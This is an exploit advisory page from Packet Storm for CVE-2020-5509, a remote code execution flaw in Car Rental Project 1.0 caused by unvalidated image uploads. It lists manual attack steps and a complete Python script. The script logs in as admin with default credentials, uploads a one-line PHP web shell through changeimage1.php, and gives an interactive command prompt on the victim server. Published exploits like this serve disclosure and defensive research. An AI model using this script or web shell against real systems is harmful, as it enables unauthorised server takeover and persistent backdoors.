what you don't know can hurt you

Car Rental Project 1.0 Remote Code Execution

Car Rental Project 1.0 Remote Code Execution
Posted Jan 13, 2020
Authored by FULLSHADE

Car Rental Project version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-5509
MD5 | fafdcec88f9ac512f946d18943f934c2

Car Rental Project 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Car Rental Project v.1.0 Remote Code Execution
# Google Dork: N/A
# Date: 1/3/2020
# Exploit Author: FULLSHADE
# Vendor Homepage:
https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509

==================================================

Information & description

==================================================

Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.

==================================================

Manual POC

==================================================

Manual POC method

- Visit carrental > admin login > changeimage1.php
- Upload a php rce vulnerable payload
- Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
- Execute commands on the server

==================================================
POC automation script
==================================================

import sys
import requests

print(
"""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution

FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
"""
)

def login():

sessionObj = requests.session()

RHOSTS = sys.argv[1]
bigstring = "\n+-------------------------------------------------------------+\n"
print("+-------------------------------------------------------------+")
print("[+] Victim host: {}".format(RHOSTS))

POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
SHELL_UPLOAD_URL = (
"http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
)

# login / authentication
payload = {"username": "admin", "password": "Test@12345", "login": ""}
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
# get response
if login.status_code == 200:
print("[+] Login HTTP response code: 200")
print("[+] Successfully logged in")
else:
print("[!] Failed to authenticate")
sys.exit()

# get session token
session_cookie_dic = sessionObj.cookies.get_dict()
token = session_cookie_dic["PHPSESSID"]
print("[+] Session cookie: {}".format(token))

# proxy for Burp testing

proxies = {"http": "
http://127.0.0.1:8080
", "https": "
http://127.0.0.1:8080
"}

# data for uploading the backdoor request
backdoor_file = {
"img1": (
"1dccadfed7bcbb036c56a4afb97e906f.php",
'<?php system($_GET["cmd"]); ?>',
"Content-Type application/x-php",
)
}
backdoor_data = {"update": ""}

SHELL_UPLOAD_URL = (
"http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
)

# actually upload the php shell
try:
r = sessionObj.post(
url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data
)
print(
"[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring
)
except:
print("[!] Failed to upload backdoor")

# get command execution
while True:
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
SHELL_LOCATION = (
"http://"
+ RHOSTS
+ "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
)
# get RCE results
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
print(respond.text)

if __name__ == "__main__":
login()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    11 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close